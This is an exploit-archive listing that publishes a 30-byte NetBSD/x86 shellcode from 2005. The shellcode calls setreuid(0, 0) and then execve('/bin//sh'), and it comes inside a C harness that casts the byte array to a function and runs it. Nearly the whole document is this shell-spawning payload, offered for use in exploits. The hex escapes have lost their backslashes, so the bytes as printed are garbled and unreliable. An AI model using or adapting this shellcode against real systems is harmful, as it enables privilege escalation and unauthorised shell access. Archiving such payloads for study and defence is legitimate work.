[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : netbsd/x86 setreuid(0, 0); execve("/bin//sh", ..., NULL); 30 bytes
# Published : 2005-11-30
# Author : p. minervini
# Previous Title : netbsd/x86 callback shellcode (port 6666) 83 bytes
# Next Title : netbsd/x86 setreuid(0, 0); execve("/bin//sh", ..., NULL); 29 bytes
/*
* minervini at neuralnoise dot com (c) 2005
* NetBSD/i386 2.0, setreuid(0, 0); execve("/bin//sh", ..., NULL);
*/
#include <sys/types.h>
#include <stdio.h>
#include <string.h>
char scode[] =
"x31xc0" // xor %eax,%eax
"x50" // push %eax
"x50" // push %eax
"x50" // push %eax
"x34x7e" // xor $0x7e,%al
"xcdx80" // int $0x80
"x58" // pop %eax
"x68x2fx2fx73x68" // push $0x68732f2f
"x68x2fx62x69x6e" // push $0x6e69622f
"x89xe3" // mov %esp,%ebx
"x50" // push %eax
"x54" // push %esp
"x53" // push %ebx
"x50" // push %eax
"x34x3b" // xor $0x3b,%al
"xcdx80"; // int $0x80
int main() {
void (*code) () = (void *) scode;
printf("length: %dn", strlen(scode));
code();
return (0);
}
// www.Syue.com [2005-11-30]